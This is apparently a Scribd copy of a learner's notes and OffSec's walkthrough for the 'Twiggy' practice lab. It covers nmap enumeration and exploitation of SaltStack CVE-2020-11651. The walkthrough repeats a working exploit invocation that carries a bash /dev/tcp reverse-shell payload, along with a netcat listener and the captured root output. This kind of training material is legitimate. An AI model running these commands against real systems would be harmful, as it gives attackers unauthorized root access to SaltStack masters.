Scribd
Upload
49 views12 pages

Twiggy

The document details the results of multiple Nmap scans on the IP address 192.168.241.62, revealing open ports and services including SSH, DNS, and HTTP with specific versions. It highlights potential vulnerabilities, particularly related to CSRF and ZeroMQ, and discusses the exploitation of a SaltStack authorization bypass vulnerability (CVE-2020-11651). Additionally, it includes steps for executing a Python exploit to gain root access, along with troubleshooting information for errors encountered during the process.

Uploaded by

Vo Tinh
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
49 views12 pages

Twiggy

The document details the results of multiple Nmap scans on the IP address 192.168.241.62, revealing open ports and services including SSH, DNS, and HTTP with specific versions. It highlights potential vulnerabilities, particularly related to CSRF and ZeroMQ, and discusses the exploitation of a SaltStack authorization bypass vulnerability (CVE-2020-11651). Additionally, it includes steps for executing a Python exploit to gain root access, along with troubleshooting information for errors encountered during the process.

Uploaded by

Vo Tinh
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 12

$ nmap -sC -sV -A -Pn 192.168.241.

62
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-04 17:25 EST
Nmap scan report for 192.168.241.62
Host is up (0.11s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 44:7d:1a:56:9b:68:ae:f5:3b:f6:38:17:73:16:5d:75 (RSA)
| 256 1c:78:9d:83:81:52:f4:b0:1d:8e:32:03:cb:a6:18:93 (ECDSA)
|_ 256 08:c9:12:d9:7b:98:98:c8:b3:99:7a:19:82:2e:a3:ea (ED25519)
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-title: Home | Mezzanine
8000/tcp open http nginx 1.16.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.16.1
|_http-title: Site doesn't have a title (application/json).
1 service unrecognized despite returning data. If you know the service/version, please
submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=11/4%Time=5FA32A68%P=x86_64-pc-linux-gnu
%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x05\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03")%r(DNSStatusRequestTCP,E,"\0\x0c\0\0\x90\x04\0\0
SF:\0\0\0\0\0\0");

Service detection performed. Please report any incorrect results at


https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.95 seconds

$ nmap -sC -sV -A -Pn -p- 192.168.241.62


Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-04 17:29 EST
Nmap scan report for 192.168.241.62
Host is up (0.11s latency).
Not shown: 65529 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 44:7d:1a:56:9b:68:ae:f5:3b:f6:38:17:73:16:5d:75 (RSA)
| 256 1c:78:9d:83:81:52:f4:b0:1d:8e:32:03:cb:a6:18:93 (ECDSA)
|_ 256 08:c9:12:d9:7b:98:98:c8:b3:99:7a:19:82:2e:a3:ea (ED25519)
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-title: Home | Mezzanine
4505/tcp open zmtp ZeroMQ ZMTP 2.0
4506/tcp open zmtp ZeroMQ ZMTP 2.0
8000/tcp open http nginx 1.16.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.16.1
|_http-title: Site doesn't have a title (application/json).
1 service unrecognized despite returning data. If you know the service/version, please
submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=11/4%Time=5FA32DA9%P=x86_64-pc-linux-gnu
%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x05\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03")%r(DNSStatusRequestTCP,E,"\0\x0c\0\0\x90\x04\0\0
SF:\0\0\0\0\0\0");

Service detection performed. Please report any incorrect results at


https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 643.56 seconds

$ nmap -Pn -p- --script vuln 192.168.241.62


Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-04 17:25 EST
Nmap scan report for 192.168.241.62
Host is up (0.15s latency).
Not shown: 65529 filtered ports
PORT STATE SERVICE
22/tcp open ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp open domain
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.241.62
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.241.62:80/
| Form id:
| Form action: /search/
|
| Path: http://192.168.241.62:80/gallery/
| Form id:
| Form action: /search/
|
| Path: http://192.168.241.62:80/search/
| Form id:
| Form action: /search/
|
| Path: http://192.168.241.62:80/about/history/
| Form id:
| Form action: /search/
|
| Path: http://192.168.241.62:80/blog/
| Form id:
| Form action: /search/
|
| Path: http://192.168.241.62:80/about/team/
| Form id:
| Form action: /search/
|
| Path: http://192.168.241.62:80/contact/legals/
| Form id:
| Form action: /search/
|
| Path: http://192.168.241.62:80/contact/
| Form id:
|_ Form action: /search/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /blog/: Blog
| /contact/: Potentially interesting folder
|_ /search/: Potentially interesting folder
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
|_http-passwd: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
4505/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
4506/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8000/tcp open http-alt
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /login/:
| session_id:
| httponly flag not set
| /stats/:
| session_id:
|_ httponly flag not set
| http-enum:
| /login/: Login page
| /index/: Potentially interesting folder
|_ /stats/: Potentially interesting folder (401 Unauthorized)

Nmap done: 1 IP address (1 host up) scanned in 1400.32 seconds

@ http://192.168.241.62/
● Mezzanine powered website -> Mezzanine - The Best Django CMS ???
http://mezzanine.jupo.org/
● @ http://mezzanine.jupo.org/docs/content-architecture.html -> Mezzanine version
4.3.1

// Searchsploit found only XSS attacks -> not interesting

● Admin login page


Try admin/admin shows the following error

@ http://192.168.241.62:8000/
// MSF search for nginx, but failed

Port 4505: ZeroMQ -> SaltStack authorization bypass


https://labs.f-secure.com/advisories/saltstack-authorization-bypass
CVE-2020-11651

https://www.exploit-db.com/exploits/48421
● https://github.com/jasperla/CVE-2020-11651-poc

// Install salt for Python 3


$ sudo apt-get install python3-venv
$ pip install distro salt

// Simply run the exploit, get some errors but still got the reverse shell as root
$ python3 CVE-2020-11651.py 192.168.139.62 master 'bash -i >&
/dev/tcp/192.168.49.139/4505 0>&1'
Attempting to ping master at 192.168.139.62
Retrieved root key:
ZSnsQyydnSirbxqu4FxOpLSDkBWsUtbM1/Qa/WF6TiDkZUm6WBvUIv7b02m/ufGOE+Cg
Tf7tlZ4=
Got response for attempting master shell: {'jid': '20201119121425865758', 'tag':
'salt/run/20201119121425865758'}. Looks promising!

Exception ignored in: <function AsyncZeroMQReqChannel.__del__ at 0x7fa23a178f70>


Traceback (most recent call last):
File "/home/kali/.local/lib/python3.8/site-packages/salt/transport/zeromq.py", line 314, in
__del__
File "/home/kali/.local/lib/python3.8/site-packages/salt/transport/zeromq.py", line 294, in
close
File "/home/kali/.local/lib/python3.8/site-packages/salt/transport/zeromq.py", line 1193, in
close
File "/home/kali/.local/lib/python3.8/site-packages/salt/transport/zeromq.py", line 1269, in
close
File "/home/kali/.local/lib/python3.8/site-packages/zmq/eventloop/zmqstream.py", line
415, in close
File "/home/kali/.local/lib/python3.8/site-packages/salt/ext/tornado/ioloop.py", line 737, in
remove_handler
File "/home/kali/.local/lib/python3.8/site-packages/salt/ext/tornado/ioloop.py", line 659, in
split_fd
File "/home/kali/.local/lib/python3.8/site-packages/zmq/sugar/socket.py", line 181, in
fileno
File "/home/kali/.local/lib/python3.8/site-packages/zmq/sugar/attrsettr.py", line 48, in
__getattr__
ImportError: sys.meta_path is None, Python is likely shutting down
===================================================
Follow the steps in the walkthrough

$ . ./env/bin/activate
$ pip install distro salt

$ sed -i 's/from platform import _supported_dists//' ./env/lib/python3.8/site-


packages/salt/grains/core.py
$ sed -i 's/_supported_dists +=/_supported_dists =/' ./env/lib/python3.8/site-
packages/salt/grains/core.py

// Run the script (get the same errors)


$ python3 CVE-2020-11651.py 192.168.139.62 master 'bash -i >&
/dev/tcp/192.168.49.139/4505 0>&1'
Attempting to ping master at 192.168.139.62
Retrieved root key:
ZSnsQyydnSirbxqu4FxOpLSDkBWsUtbM1/Qa/WF6TiDkZUm6WBvUIv7b02m/ufGOE+Cg
Tf7tlZ4=
Got response for attempting master shell: {'jid': '20201119120355646732', 'tag':
'salt/run/20201119120355646732'}. Looks promising!
Exception ignored in: <function AsyncZeroMQReqChannel.__del__ at 0x7f9a111f38b0>
Traceback (most recent call last):
File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/salt/transport/
zeromq.py", line 314, in __del__
File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/salt/transport/
zeromq.py", line 294, in close
File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/salt/transport/
zeromq.py", line 1193, in close
File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/salt/transport/
zeromq.py", line 1269, in close
File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/zmq/eventloop/
zmqstream.py", line 415, in close
File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/salt/ext/tornado/
ioloop.py", line 737, in remove_handler
File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/salt/ext/tornado/
ioloop.py", line 659, in split_fd
File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/zmq/sugar/
socket.py", line 256, in fileno
File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/zmq/sugar/
attrsettr.py", line 48, in __getattr__
ImportError: sys.meta_path is None, Python is likely shutting down

// Event when we run the python script, it has some errors as below, waiting for 1 minute,
we still get the reverse shell as root
(??? How to fix the exploit to remove errors ???)
Proof.txt: 4dbda8d231f2cc3ff4768dd1448f6df1

// Try the script exploit.py from https://github.com/jasperla/CVE-2020-11651-poc


It works without any errors :)
-> Get the same results: Root key and scheduled job
-> Then execute the reverse command

- Usage:
exploit.py [-h] [--master MASTER_IP] [--port MASTER_PORT] [--force] [--debug] [--run-
checks] [--read READ_FILE] [--upload-src UPLOAD_SRC] [--upload-dest
UPLOAD_DEST] [--exec EXEC] [--exec-all EXEC_ALL]

$ python3 exploit.py --master 192.168.139.62 --exec 'bash -i >&


/dev/tcp/192.168.49.139/4505 0>&1'
[!] Please only use this script to verify you have correctly patched systems you have
permission to access. Hit ^C to abort.
[+] Checking salt-master (192.168.139.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained:
ZSnsQyydnSirbxqu4FxOpLSDkBWsUtbM1/Qa/WF6TiDkZUm6WBvUIv7b02m/ufGOE+Cg
Tf7tlZ4=
[+] Attemping to execute bash -i >& /dev/tcp/192.168.49.139/4505 0>&1 on
192.168.139.62
[+] Successfully scheduled job: 20201119123901934549
Walkthrough by OffSec
Exploitation Guide for Twiggy
Service Enumeration

Nmap scan report for 192.168.83.220


Host is up (0.0011s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
4505/tcp open unknown
4506/tcp open unknown
8000/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 105.30 seconds

Root Shell
Download and configure the exploit
https://github.com/dozernz/cve-2020-11651
Some tweaks are required as Salt doesn’t support Python 3.8 and Kali won’t let you install
packages under Python 3.7.

python3 -m venv env


. ./env/bin/activate
pip install distro salt
sed -i 's/from platform import _supported_dists//'
./env/lib/python3.8/site-packages/salt/grains/core.py
sed -i 's/_supported_dists +=/_supported_dists =/'
./env/lib/python3.8/site-packages/salt/grains/core.py

Start a Netcat handler

nc -lvp 4505

Run the exploit

(env) dylan@kali:~/machines/twiggy$ python3 exploit.py 192.168.83.220 master 'bash -i


>& /dev/tcp/192.168.83.219/4505 0>&1'
/home/dylan/machines/twiggy/env/lib/python3.8/site-packages/salt/ext/tornado/
httputil.py:107: DeprecationWarning: Using or importing the ABCs from 'collections'
instead of from 'collections.abc' is deprecated since Python 3.3, and in 3.9 it will stop
working
class HTTPHeaders(collections.MutableMapping):
Attempting to ping master at 192.168.83.220
Retrieved root key:
8tnPuz4Fk+nH4c2CVW3/1BBbWofubqMZGJ1gkEkiB6WzlnyqQ7muDw3dbtKNwTMjUU6I
cNFD9VY=
Got response for attempting master shell: {'jid': '20200518074808085260', 'tag':
'salt/run/20200518074808085260'}. Looks promising!

Wait a minute and catch the shell

dylan@kali:~$ nc -lvp 4505


listening on [any] 4505 ...
192.168.83.220: inverse host lookup failed: Unknown host
connect to [192.168.83.219] from (UNKNOWN) [192.168.83.220] 33584
bash: no job control in this shell
[root@localhost root]# id
id
uid=0(root) gid=0(root) groups=0(root)

You might also like